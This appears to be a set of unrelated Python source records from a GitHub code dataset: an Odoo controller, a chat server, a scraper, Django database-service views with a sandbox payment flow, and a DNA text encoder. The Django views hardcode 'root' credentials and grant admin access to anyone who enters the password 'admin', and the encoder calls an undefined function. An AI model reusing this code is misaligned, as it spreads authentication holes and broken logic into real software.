'sortby': sortby,\n 'groupby': groupby,\n 'search_in': search_in,\n 'search': search,\n 'filterby': filterby,\n })\n if partner and not partner.enable_helpdesk_portal_access:\n values = {}\n return request.render(\"helpdesk.portal_helpdesk_ticket\", values)\n\n\n\n","repo_name":"westlyou/astron-simulator","sub_path":"sme/sd_portal_access_helpdesk/controllers/controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":10016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
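The filter and search handling above leans entirely on Odoo's domain combinators; how OR and AND normalize nested domains into prefix notation can be seen standalone (runnable anywhere the odoo package is importable):

    from odoo.osv.expression import AND, OR

    search_domain = OR([[('id', 'ilike', '7')], [('name', 'ilike', 'printer')]])
    domain = AND([[('partner_id', '=', 42)], search_domain])
    print(domain)
    # ['&', ('partner_id', '=', 42), '|', ('id', 'ilike', '7'), ('name', 'ilike', 'printer')]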
+{"seq_id":"36958556166","text":"from xml.etree import ElementTree as etree\nfrom GAST import GAST\nimport clang.cindex\nfrom clang.cindex import CursorKind\nimport csv\nimport os\n\nclass Cpp_Ast(GAST):\n\n def __init__(self, root, filename):\n self.root = root\n self.filename = filename\n reader = csv.reader(open(os.getcwd()+\"/media/translation_cpp.csv\", \"r\"), delimiter='\\t')\n self.gast_dict = {rows[0]:rows[1] for rows in reader}\n self.ignore = [\"(\", \")\", \";\", \"{\", \"}\"]\n self.ops = [\"++\", \"--\", \"~\", \"!\", \"+\", \"-\", \"&\", \"*\", \"%\", \"/\", \"<<\", \">>\", \"<\", \">\", \"<=\", \">=\", \"==\", \"!=\", \"&\", \"^\", \"|\", \"&&\", \"||\", \"=\", \"*=\", \"/=\", \"%=\", \"+=\", \"-=\", \">>=\", \"<<=\", \"&=\", \"^=\", \"|=\", \"?\", \":\"]\n self.branchList = [\"if\", \"while\", \"for\", \"case\"]\n self.totalBranches = 0\n\n def getRoot(self):\n return self.root\n\n def translate(self, node, name):\n if name in self.gast_dict:\n return self.gast_dict[name]\n else:\n return \"Unknown\"\n\n def str_node(self, node, tag):\n tag.set(\"lineno\", str(node.location.line))\n tag.set(\"col_offset\", str(node.location.column))\n \n tokenNum = opNum = 0\n\n if node.label == \"BinaryOperator\":\n tmp = etree.SubElement(tag, \"BinaryOperatorMeta\")\n\n if node.label == \"UnaryOperator\":\n tmp = etree.SubElement(tag, \"UnaryOperatorMeta\")\n\n tokenNum = 0\n branchCount = 0\n for x in node.get_tokens():\n identifier = str(x.kind)[:str(x.kind).index('.')+1]\n if x.spelling in self.ignore:\n continue\n if ((node.kind == CursorKind.CXX_METHOD or\n node.kind == CursorKind.FUNCTION_DECL or\n node.kind == CursorKind.CONSTRUCTOR)\n and node.is_definition()):\n \n if x.spelling in self.branchList:\n tag.set(\"mccabe\", str(int(tag.get(\"mccabe\", default=\"0\"))+1))\n\n if node.label == \"BinaryOperator\":\n if x.spelling in self.ops:\n tmp2 = etree.SubElement(tmp, \"tor\")\n tmp2.text = x.spelling\n else:\n tmp2 = etree.SubElement(tmp, \"rand\")\n tmp2.text = x.spelling\n if node.label == \"UnaryOperator\":\n if x.spelling in self.ops:\n tmp2 = etree.SubElement(tmp, \"tor\")\n tmp2.text = x.spelling\n else:\n tmp2 = etree.SubElement(tmp, \"rand\")\n tmp2.text = x.spelling\n\n def ast_visit(self, node, pnode=None, level=0):\n identifier = str(node.kind)[:str(node.kind).index('.')]\n kind = str(node.kind)[str(node.kind).index('.')+1:]\n node.label = self.translate(node, kind)\n if level == 0:\n node.tag = etree.SubElement(self.root, node.label)\n else:\n node.tag = etree.SubElement(pnode.tag, node.label)\n self.str_node(node, node.tag)\n\n if identifier == \"CursorKind\":\n for c in node.get_children():\n if str(c.location.file) == self.filename:\n self.ast_visit(c, node, level=level+1)\n\n def fix_ops(self):\n for tags in self.root.iter('BinaryOperator'):\n tags.append(tags[0])\n\n for tags in self.root.iter('UnaryOperator'):\n tags.append(tags[0])\n \n","repo_name":"zmcnellis/codeEvalPrototype","sub_path":"media/cpp_ast.py","file_name":"cpp_ast.py","file_ext":"py","file_size_in_byte":3399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18324095121","text":"import sys\nimport math\nfrom collections import deque\n\nsys.setrecursionlimit(100000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\n\ndef main():\n N = NI()\n S = NLI()\n\n A = [0] * 1001\n for a in range(1, 1001):\n for b in range(1, 1001):\n s = 4*a*b + 3*a + 3*b\n if s < 1001:\n A[s] = 1\n\n ans = 0\n for s in S:\n if A[s] == 0:\n ans += 1\n\n print(ans)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Mao-beta/AtCoder","sub_path":"ABC/ABC227/ABC227B.py","file_name":"ABC227B.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"1702200361","text":"import socket\nimport threading\nfrom colorama import Fore, init\n\n# INITIALIZING COLORAMA\ninit()\n\n\n# DECLARING CONSTANTS\nPORT = 5050 # Here goes the port you want the people to connect to\nSERVER = \"0.0.0.0\" # Here goes the ip address you want the server to run on\nADDRESS = (SERVER, PORT)\nFORMAT = \"utf-8\"\nBUFSIZ = 512\n\n# DECLARING VARIABLES\nclients = []\nmessages = []\n\n# INITIALIZING SERVER\nserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nserver.bind(ADDRESS)\n\n\ndef broadcast_username(username):\n for client in clients:\n client.send(f\" {username} has connected.\".encode(FORMAT))\n\n\ndef broadcast_message(username, message):\n for client in clients:\n client.send(f\" [{username}] {message}\".encode(FORMAT))\n\n\ndef broadcast_exit_message(username):\n for client in clients:\n client.send(f\" {username} has left the chat.\".encode(FORMAT))\n\n\ndef start():\n try:\n print(f\"[STARTING] Server is starting...\" + \"\\n\")\n server.listen()\n print(Fore.GREEN + f\"[LISTENING] Server is listening on {SERVER}\", Fore.RESET, \"\\n\")\n while True:\n conn, addr = server.accept()\n clients.append(conn)\n thread1 = threading.Thread(target=handle_clients, args=(conn, addr))\n thread1.start()\n except Exception as e:\n print(Fore.RED + \"[ERROR] Please try again\", Fore.RESET)\n\n\ndef handle_clients(connection, address):\n client_username = connection.recv(BUFSIZ).decode(FORMAT)\n broadcast_username(client_username)\n print(Fore.GREEN + f\"{client_username} has connected !\", Fore.RESET)\n while True:\n try:\n client_message = connection.recv(BUFSIZ).decode(FORMAT)\n if client_message == \"!1!2!3!\":\n broadcast_exit_message(client_username)\n print(Fore.RED + f\"{client_username} has left the chat.\" + Fore.RESET)\n connection.close()\n clients.remove(connection)\n break\n else:\n broadcast_message(client_username, client_message)\n print(f\"[{client_username}] {client_message}\")\n except:\n print(Fore.RED + f\"{client_username} has left the chat.\" + Fore.RESET)\n connection.close()\n clients.remove(connection)\n break\n\n\n\nstart()\n","repo_name":"kknownymouss/tkinter-Chatapp","sub_path":"server_side.py","file_name":"server_side.py","file_ext":"py","file_size_in_byte":2315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"72655131280","text":"from selenium import webdriver\nimport mytoken as token\n\n# headless mode\noptions = webdriver.FirefoxOptions()\noptions.add_argument('-headless')\n\nbrowser = webdriver.Firefox(options = options)\n\n# login\nbrowser.get(r'http://academic.tsinghua.edu.cn/')\nbrowser.find_element_by_name('userName').send_keys(token.username)\nbrowser.find_element_by_name('password').send_keys(token.pswd)\nbrowser.find_element_by_id('logining').click()\n\n# enter choose lesson page\nbrowser.get(r'http://zhjw.cic.tsinghua.edu.cn/xkBks.vxkBksJxjhBs.do?m=kkxxSearch&p_xnxq=2018-2019-2')\nwith open('pages/page1.html', 'w') as f:\n f.write(browser.page_source)\n\n# all pages\npages = 2\ntotal_pages = 226\nfor i in range(2,total_pages+1):\n browser.find_element_by_id('nextpage').click()\n with open('pages/page%s.html'%pages, 'w') as f:\n f.write(browser.page_source)\n print('%ssucceed!'%pages)\n pages = pages + 1\n","repo_name":"jcq15/chooseCourseHelper","sub_path":"getHtml.py","file_name":"getHtml.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"42846694639","text":"import logging\nimport os\nfrom tempfile import TemporaryDirectory\n\nfrom pyscreenshot.err import FailedBackendError\nfrom pyscreenshot.imcodec import codec\nfrom pyscreenshot.util import run_mod_as_subproc\n\nlog = logging.getLogger(__name__)\n\n\ndef childprocess_backend_version(backend):\n p = run_mod_as_subproc(\"pyscreenshot.cli.print_backend_version\", [backend])\n if p.return_code != 0:\n log.warning(p)\n raise FailedBackendError(p)\n\n return p.stdout\n\n\ndef childprocess_grab(backend, bbox):\n with TemporaryDirectory(prefix=\"pyscreenshot\") as tmpdirname:\n filename = os.path.join(tmpdirname, \"screenshot.png\")\n cmd = [\"--filename\", filename]\n if bbox:\n x1, y1, x2, y2 = map(str, bbox)\n bbox = \":\".join(map(str, (x1, y1, x2, y2)))\n cmd += [\"--bbox\", bbox]\n if backend:\n cmd += [\"--backend\", backend]\n if log.isEnabledFor(logging.DEBUG):\n cmd += [\"--debug\"]\n\n p = run_mod_as_subproc(\"pyscreenshot.cli.grab\", cmd)\n if p.return_code != 0:\n # log.debug(p)\n raise FailedBackendError(p)\n\n data = open(filename, \"rb\").read()\n data = codec[1](data)\n return data\n","repo_name":"ponty/pyscreenshot","sub_path":"pyscreenshot/childproc.py","file_name":"childproc.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":475,"dataset":"github-code","pt":"3"}
+{"seq_id":"18688579278","text":"import os\nimport codecs\nfrom setuptools import setup, find_packages\n\ndef read(fname):\n return codecs.open(os.path.join(os.path.dirname(__file__), fname)).read()\n\nsetup(\n name='django-periodformat',\n version='0.0.1',\n description='Filter helper for date period formating.',\n long_description = read('README.md'),\n author='David Charbonnier',\n author_email='dcharbonnier@gmail.com',\n url = 'https://github.com/oxys-net/django-periodformat',\n download_url='',\n packages=find_packages(),\n include_package_data=True,\n classifiers=[\n 'Development Status :: 4 - Beta',\n 'Environment :: Web Environment',\n 'Framework :: Django',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Operating System :: OS Independent',\n 'Programming Language :: Python',\n ],\n zip_safe = False,\n)","repo_name":"oysnet/django-periodformat","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10986692246","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nfrom urllib.parse import parse_qs\n\nstatus_code = int(parse_qs(os.environ.get('QUERY_STRING', ''), keep_blank_values=True).get('status-code', [200])[0])\nscript_url = os.environ.get('SCRIPT_URL', '')\nhttp_host = os.environ.get('HTTP_HOST', '')\n\nsys.stdout.write('status: {}\\r\\n'.format(status_code))\n\nif status_code == 200:\n sys.stdout.write(\n 'Content-Type: text/event-stream\\r\\n\\r\\n'\n 'data: hello\\n\\n'\n )\nelif status_code in [301, 302, 303, 307]:\n sys.stdout.write(\n 'Content-Type: text/html\\r\\n'\n 'Location: http://{}{}/simple-event-stream.asis\\r\\n\\r\\n'.format(http_host, '/'.join(script_url.split('/')[0:-1]))\n )\nelse:\n sys.stdout.write('Content-Type: text/html\\r\\n\\r\\n')","repo_name":"WebKit/WebKit","sub_path":"LayoutTests/http/tests/eventsource/resources/status-codes.py","file_name":"status-codes.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":6880,"dataset":"github-code","pt":"3"}
+{"seq_id":"8843598839","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.urls import reverse\nfrom . import connection\nfrom django.contrib.auth.models import User\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login as auth_login\nfrom django.http import HttpResponse\nfrom django.shortcuts import redirect\nfrom zeep import Client\nimport jdatetime\n\n\n\ntry:\n client = connection.Connection('root', 'root', '0.0.0.0', 6543)\nexcept:\n pass\n\n\n# Create your views here..\n# process on sign up page and return alert and rediret\ndef register_handler(request):\n global client\n fname=request.POST.get('firstname', False)\n lname=request.POST.get('lastname', False)\n email=request.POST.get('email', False)\n username = request.POST.get('username', False)\n password = request.POST.get('pass', False)\n password_repeat = request.POST.get('pass-repeat', False)\n if password == password_repeat:\n if username and password:\n client.create_user(username, password)\n User.objects.create_user(first_name=fname,last_name=lname,email=email,username=username, password=password,)\n messages.success(request, 'Your registration has been successfully completed')\n else:\n messages.error(request, 'Registration was encountered error')\n else:\n messages.warning(request, 'your password is not equal')\n\n return HttpResponseRedirect(reverse('movie:login'))\n\n\n# render login page\ndef login(request):\n return render(request, 'movie/login.html', {})\n\n\n# process on login page and redirect\ndef user_Authenticate(request):\n username = request.POST.get('uname', False)\n password = request.POST.get('psw', False)\n if username and password =='admin':\n return HttpResponseRedirect(reverse('movie:adminPage'))\n else:\n user = authenticate(request, username=username, password=password)\n if user is not None:\n auth_login(request, user)\n return HttpResponseRedirect(reverse('movie:profile'))\n\n else:\n messages.error(request, 'Your account is not logged in. 
 'Your account is not logged in. Please register')\n            return HttpResponseRedirect(reverse('movie:login'))\n\n\n# render index.html file\ndef profile(request):\n    global client\n    now_date=jdatetime.date.today().strftime(\"%d /%m /%Y\")\n    top_name = request.user.username\n    db_user = client.return_user_dbs(top_name)\n    chart_items = client.chart_doughnut(top_name)\n    if db_user == 'false':\n        no_dbs = 'There are no databases'\n    else:\n        no_dbs = 'not null'\n    Percentage = []\n    if chart_items[0][0]!=None:\n        if chart_items[0][4]==0:\n            chart_items[0][4]=1\n\n        for i in range(0, len(chart_items[0])-1):\n            Percentage.append(round((chart_items[0][i] * 100) / chart_items[0][4], 2))\n    total_cost=0\n    if db_user=='false':\n        total_cost=0\n    else:\n        for i in db_user:\n            total_cost+=i[6]\n    return render(request, 'gentelella/index.html',\n                  {'top_name': top_name, 'db_user': db_user, 'no_dbs': no_dbs, 'chart_items': chart_items[0],\n                   'Percentage': Percentage,'now_date':now_date,'total_cost':total_cost})\n\n\n# render form.html file\ndef profiel_form(request):\n    global client\n    now_date=jdatetime.date.today().strftime(\"%d /%m /%Y\")\n    top_name = request.user.username\n    database_name = request.POST.get('db_name', False)\n    if database_name:\n        db = top_name + \"_\" + database_name\n        client.insert_db_info(top_name, db)\n        client.create_database(db)\n        return HttpResponseRedirect(reverse('movie:profiel_form'))\n\n    db_user = client.return_user_dbs(top_name)\n    return render(request, 'gentelella/form.html', {'top_name': top_name, 'db_user': db_user,'now_date':now_date})\n\n\ndef create_db_info(request):\n    global client\n    client.create_db_info()\n    return HttpResponse('Done')\n\n\ndef send_request(request):\n    global client\n    db_user = client.return_user_dbs(request.user.username)\n    total_cost=0\n    if db_user=='false':\n        total_cost=0\n    else:\n        for i in db_user:\n            total_cost+=i[6]\n    MERCHANT = '00000000-0000-0000-0000-000000000000'\n    client1 = Client('https://sandbox.zarinpal.com/pg/services/WebGate/wsdl')\n    amount = total_cost  # Toman / Required\n    description = \"Transaction for using the database system as a cloud service\"  # Required\n    email = 'DBAS@db.ir'  # Optional\n    mobile = '09123456789'  # Optional\n    CallbackURL = 'http://93.118.97.199:8085/verify/'  # Important: needs to be edited for the real server.\n    result = client1.service.PaymentRequest(MERCHANT, amount, description, email, mobile, CallbackURL)\n    if result.Status == 100:\n        return redirect('https://sandbox.zarinpal.com/pg/StartPay/' + str(result.Authority))\n    else:\n        return HttpResponse('Error code: ' + str(result.Status))\n\n\n\ndef verify(request):\n    global client\n    myUser=request.user.username\n    db_user = client.return_user_dbs(myUser)\n    total_cost=0\n    if db_user=='false':\n        total_cost=0\n    else:\n        for i in db_user:\n            total_cost+=i[6]\n    MERCHANT = '00000000-0000-0000-0000-000000000000'\n    client1 = Client('https://sandbox.zarinpal.com/pg/services/WebGate/wsdl')\n    amount = total_cost  # Toman / Required\n    if request.GET.get('Status') == 'OK':\n        result = client1.service.PaymentVerification(MERCHANT, request.GET['Authority'], amount)\n        if result.Status == 100:\n            client.payment_action(myUser)\n            # return HttpResponse('Transaction success.\\nRefID: ' + str(result.RefID))\n\n            return HttpResponseRedirect(reverse('movie:profile'))\n        elif result.Status == 101:\n            return HttpResponse('Transaction submitted : ' + str(result.Status))\n        else:\n            return HttpResponse('Transaction failed.\\nStatus: ' + str(result.Status))\n    else:\n        return HttpResponse('Transaction failed or canceled by user')\n\n\n\ndef adminPage(request):
now_date=jdatetime.date.today().strftime(\"%d /%m /%Y\")\n users=User.objects.all()\n # usernames = User.objects.values_list('email', flat=True)\n for i in users:\n print (i.email)\n return render(request,'gentelella/tables.html',{'now_date':now_date,'users':users})\n\ndef show_info(request,user_name):\n global client\n now_date=jdatetime.date.today().strftime(\"%d /%m /%Y\")\n db_user = client.return_user_dbs(user_name)\n chart_items = client.chart_doughnut(user_name)\n if db_user == 'false':\n no_dbs = 'There are no databases'\n else:\n no_dbs = 'not null'\n Percentage = []\n if chart_items[0][0]!=None:\n if chart_items[0][4]==0:\n chart_items[0][4]=1\n\n for i in range(0, len(chart_items[0])-1):\n Percentage.append(round((chart_items[0][i] * 100) / chart_items[0][4], 2))\n total_cost=0\n if db_user=='false':\n total_cost=0\n else:\n for i in db_user:\n total_cost+=i[6]\n return render(request, 'gentelella/index.html',\n {'top_name': user_name, 'db_user': db_user, 'no_dbs': no_dbs, 'chart_items': chart_items[0],\n 'Percentage': Percentage,'now_date':now_date,'total_cost':total_cost})\n\n\n\n\n\n\ndef create_database(request):\n global client\n # client.create_database('nano')\n client.use_database('sajjad_userInfo')\n client.create_table('j', {'id': 'int', 'name': 'text'}, ['id'])\n # client.create_table('jamali', {'id': 'int', 'first_name': 'text', 'last_name': 'text', 'date_of_birth': 'text'},\n # ['id'])\n # client.create_table('jamshidi',\n # {'id': 'int', 'name': 'text', 'director_id': 'int', 'country_id': 'int', 'year': 'text',\n # 'description': 'text'}, ['id'])\n return HttpResponse('Done')\n\ndef index(request):\n global client\n client.use_database('movie')\n movie_table = client.table('movie')\n movies = movie_table.get_item()\n\n country_table = client.table('country')\n countries = country_table.get_item()\n\n director_table = client.table('director')\n directors = director_table.get_item()\n\n for i in range(0, len(movies)):\n for country in countries:\n if int(country['id']) == int(movies[i]['country_id']):\n movies[i]['country_name'] = country['name']\n for director in directors:\n if int(director['id']) == int(movies[i]['director_id']):\n movies[i]['director_name'] = director['first_name'] + \" \" + director['last_name']\n return render(request, 'movie/index.html', {'movies': movies})\n\n\ndef country(request):\n global client\n client.use_database('jamshidi_reza_salam')\n table = client.table('ahmadi')\n rows = table.get_item()\n return render(request, 'movie/country.html', {'rows': rows})\n\n\ndef add_country(request):\n global client\n client.use_database('jamshidi_reza_salam')\n # client.use_database('movie')\n table = client.table('ahmadi')\n id = request.POST['id']\n name = request.POST['name']\n table.put_item({'id': int(id), 'name': name})\n return HttpResponseRedirect(reverse('movie:country'))\n\n\ndef update_country(request):\n global client\n client.use_database('jamshidi_reza_salam')\n table = client.table('ahmadi')\n id = request.POST['id']\n name = request.POST['name']\n table.update_item({'name': name}, {'id': int(id)})\n return HttpResponseRedirect(reverse('movie:country'))\n\n\ndef delete_country(request):\n global client\n client.use_database('jamshidi_reza_salam')\n table = client.table('ahmadi')\n id = request.GET['id']\n table.delete_item({'id': int(id)})\n return HttpResponseRedirect(reverse('movie:country'))\n\n\ndef director(request):\n global client\n client.use_database('movie')\n table = client.table('director')\n rows = table.get_item()\n 
return render(request, 'movie/director.html', {'rows': rows})\n\n\ndef add_director(request):\n global client\n client.use_database('movie')\n table = client.table('director')\n id = request.POST['id']\n first_name = request.POST['first_name']\n last_name = request.POST['last_name']\n date_of_birth = request.POST['date_of_birth']\n table.put_item({'id': int(id), 'first_name': first_name, 'last_name': last_name, 'date_of_birth': date_of_birth})\n return HttpResponseRedirect(reverse('movie:director'))\n\n\ndef delete_director(request):\n global client\n client.use_database('movie')\n table = client.table('director')\n id = request.GET['id']\n table.delete_item({'id': int(id)})\n return HttpResponseRedirect(reverse('movie:director'))\n\n\ndef movie(request):\n global client\n client.use_database('movie')\n table1 = client.table('movie')\n rows = table1.get_item()\n\n table2 = client.table('director')\n directors = table2.get_item()\n\n table3 = client.table('country')\n countries = table3.get_item()\n return render(request, 'movie/movie.html', {'rows': rows, 'directors': directors, 'countries': countries})\n\n\ndef add_movie(request):\n global client\n client.use_database('movie')\n table = client.table('movie')\n id = int(request.POST['id'])\n name = request.POST['name']\n director_id = int(request.POST['director_id'])\n country_id = int(request.POST['country_id'])\n year = request.POST['year']\n description = request.POST['description']\n table.put_item({'id': id, 'name': name, 'director_id': director_id, 'country_id': country_id, 'year': year,\n 'description': description})\n return HttpResponseRedirect(reverse('movie:movie'))\n\n\ndef delete_movie(request):\n global client\n client.use_database('movie')\n table = client.table('movie')\n id = request.GET['id']\n table.delete_item({'id': int(id)})\n return HttpResponseRedirect(reverse('movie:movie'))\n\n\n","repo_name":"rezakiani73/database_as_service","sub_path":"movies/movie/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11908,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"28238897031","text":"from __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\nimport models\nfrom models import *\n\nFLAGS = tf.flags.FLAGS\ntf.flags.DEFINE_integer(\"batch_size\", \"64\", \"batch size for training\")\ntf.flags.DEFINE_float(\"learning_rate\", \"2e-5\", \"learning rate for optimizers\")\ntf.flags.DEFINE_float(\"optimizer_param\", \"0.5\", \"beta1 for adam-decay for RMSProp\")\ntf.flags.DEFINE_float(\"iterations\", \"500000\", \"training iterations\")\ntf.flags.DEFINE_string(\"optimizer\", \"RMSProp\", \"RMSProp/Adam\")\ntf.flags.DEFINE_string(\"loss_type\", \"wasserstein_l2_loss\", \"wasserstein/imp_wasserstein/wasserstein_l1_loss/wasserstein_l2_loss/imp_wasserstein_l2_loss\")\n\ndef main(argv=None):\n discriminator_dims = [3, 16, 64, 1]\n kernel_encoder = [5,7,9]\n kernel_decoder = [9,7,5]\n encoder_dims = [64,16,3]\n decoder_dims = [16,32,3]\n\n print(\"stage 1\")\n model = models.GAN_AE(FLAGS.batch_size,\n clip_values=(-0.01, 0.01), disc_iterations=5, num_train_data=38400, num_test_data=6400, folder='wgan_l2')\n print(\"stage 2\")\n model.create_model(discriminator_dims, kernel_encoder, kernel_decoder, encoder_dims, decoder_dims, \"RMSProp\", FLAGS.learning_rate,\n FLAGS.optimizer_param, FLAGS.loss_type)\n\n print(\"stage 3\")\n model.train_model(FLAGS.batch_size, int(FLAGS.iterations))\n\n discriminator_dims = [3, 16, 64, 1]\n\nif __name__ == \"__main__\":\n tf.app.run()\n","repo_name":"scelesticsiva/Neural-Networks-for-Image-Compression","sub_path":"GAN/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1428,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"3"}
+{"seq_id":"16736045461","text":"import string\n\nasciilst = list(string.printable)\nalphabet = dict(zip(asciilst, range(1, 101)))\naddresses = []\n\nchars = ['a','g','c','t']\nstart = ['a','a','a','a','a']\nadnacii = {}\nextra = []\ninitial = []\n\ndef last_char(lst):\n for i in chars:\n start[4] = i\n initial.append(start[:])\n\ndef nextlast_char(lst):\n for i in chars:\n start[3] = i\n last_char(lst)\n\ndef nnlchar(lst):\n for i in chars:\n start[2] = i\n nextlast_char(lst)\n\ndef nnnlchar(lst):\n for i in chars:\n start[1] = i\n nnlchar(lst)\n\ndef nnnnlchar(lst):\n for i in chars:\n start[0] = i\n nnnlchar(lst)\n\ndef join(lst):\n for i in lst:\n lst[lst.index(i)] = ''.join(i)\n\ndef check(lst):\n lst[:] = [x for x in lst if 'tt' not in x]\n lst[:] = [x for x in lst if 'gg' not in x]\n lst[:] = [x for x in lst if 'aa' not in x]\n lst[:] = [x for x in lst if 'cc' not in x]\n\nnnnnlchar(start)\njoin(initial)\ncheck(initial)\n\ndef assign(lst, asciilst):\n x = 101\n zipl = lst[:x]\n return dict(zip(asciilst, zipl))\n\ndef assign2(lst, asciilst):\n x = 201\n y = 100\n zipl = lst[y:x]\n return dict(zip(asciilst, zipl))\n\ndef assign3(lst, asciilst):\n x = 301\n y = 200\n zipl = lst[y:x]\n return dict(zip(asciilst, zipl))\n\nadnacii = assign(initial, asciilst)\nadnacii2 = assign2(initial, asciilst)\nadnacii3 = assign3(initial, asciilst)\naSearch = dict(zip(adnacii.values(), adnacii.keys()))\na2Search = dict(zip(adnacii2.values(), adnacii2.keys()))\na3Search = dict(zip(adnacii3.values(), adnacii3.keys()))\n\ndef extraassign(lst):\n x = 307\n return lst[x:]\n\nextraassign(initial)\n\nadnacii[' end_str '] = initial[301]\nadnacii2[' end_str '] = initial[302]\nadnacii3[' end_str '] = initial[303]\nadnacii[' ad_b '] = initial[304]\nadnacii[' ad_e '] = initial[305]\nadnacii[' full_end '] = initial[306]\nadnacii[' spacer1 '] = 'c'\nadnacii[' spacer2 '] = 'a'\n\ndef three_con(txt, asys):\n lst = []\n for i in txt:\n lst.append(asys[i])\n x = 0\n seq = lst[x:x+5]\n lchar = ''\n return lst\n\ndef address():\n global addresses\n ad1 = ''\n rem = input(\"Would you like to reset the address list to empty? y or n: \")\n if rem == 'y':\n addresses = []\n if len(addresses) == 0:\n ad1 = 0\n else:\n ad1 = addresses[-1] + 1\n addresses.append(ad1)\n ad1 = adnacii[' ad_b '] + adnacii[str(ad1)] + adnacii[' ad_e ']\n return ad1\n\ndef converter():\n txt = input(\"What text would you like to be converted? 
\")\n dnatxt = three_con(txt, adnacii)\n checksum = 0\n x = 0\n seq = dnatxt[x:x+5]\n for seq in dnatxt:\n checksum = checksum + alphabet[aSearch[seq]]\n x+=6\n seq = dnatxt[x:x+5]\n checksum = list(str(checksum))\n csencode = []\n for i in checksum:\n csencode.append(adnacii[i])\n checksum = csencode\n dnatxt2 = three_con(txt, adnacii2)\n dnatxt3 = three_con(txt, adnacii3)\n endtxt = list(address()) + dnatxt + list(adnacii[' end_str ']) + dnatxt2 + list(adnacii2[' end_str ']) + dnatxt3 + list(adnacii3[' end_str ']) + checksum + list(adnacii[' full_end '])\n endtxt = list(''.join(endtxt))\n x = 0\n seq = endtxt[x:x+5]\n print(endtxt)\n while ''.join(seq) != adnacii[' full_end ']:\n print(seq)\n lchar = seq[-1]\n if lchar == 'a' or lchar == 'g' or lchar == 't':\n endtxt[x+5:] = list(adnacii[' spacer1 ']) + endtxt[x+5:]\n else:\n endtxt[x+5:] = list(adnacii[' spacer2 ']) + endtxt[x+5:]\n x+=5\n seq = endtxt[x:x+5]\n endtxt = ''.join(endtxt)\n print(endtxt)\n return endtxt\n\ndef checkSeq(a1l, a2l, a3l, data):\n if a1l == a2l == a3l:\n return ''.join(a1l)\n else:\n cs1 = 0\n for i in a1l:\n cs1 = cs1 + alphabet[i]\n cs2 = 0\n for i in a2l:\n cs2 = cs2 + alphabet[i]\n cs3 = 0\n for i in a3l:\n cs3 = cs3 + alphabet[i]\n checksum = []\n x = data.index(adnacii3[' end_str ']) + 6\n seq = data[x:x+5]\n while seq != adnacii[' full_end ']:\n checksum.append(aSearch[seq])\n x+=6\n seq = data[x:x+5]\n checksum = sum(checksum)\n if cs1 == checksum:\n return ''.join(a1l)\n elif cs2 == checksum:\n return ''.join(a2l)\n elif cs3 == checksum:\n return ''.join(a3l)\n else:\n print(\"Opt. 1: \" + ''.join(a1l))\n print(\"Opt. 2: \" + ''.join(a2l))\n print(\"Opt. 3: \" + ''.join(a3l))\n wr = input(\"Which one makes the most sense - opt1, opt2, or opt3? \")\n if wr == 'opt1':\n return ''.join(a1l)\n elif wr == 'opt2':\n return ''.join(a2l)\n else:\n return ''.join(a3l)\n\ndef reader(data):\n a1l = []\n x = data.index(adnacii[' ad_e ']) + 6\n seq = data[x:x+5]\n while seq != adnacii[' end_str ']:\n a1l.append(aSearch[seq])\n x+=6\n seq = data[x:x+5]\n x+=6\n seq = data[x:x+5]\n a2l = []\n while seq != adnacii2[' end_str ']:\n a2l.append(a2Search[seq])\n x+=6\n seq = data[x:x+5]\n x+=6\n seq = data[x:x+5]\n a3l = []\n while seq != adnacii3[' end_str ']:\n a3l.append(a3Search[seq])\n x+=6\n seq = data[x:x+5]\n return checkseq(a1l, a2l, a3l, data)\n\ndef openSpecial():\n file = input(\"Which file? \")\n try:\n with open(file, 'r') as myfile:\n data = myfile.read()\n print(reader(data))\n except FileNotFoundError:\n print(\"file not found\")\n return None\n","repo_name":"physicsnerd/adnascii","sub_path":"ADNACII.py","file_name":"ADNACII.py","file_ext":"py","file_size_in_byte":5599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
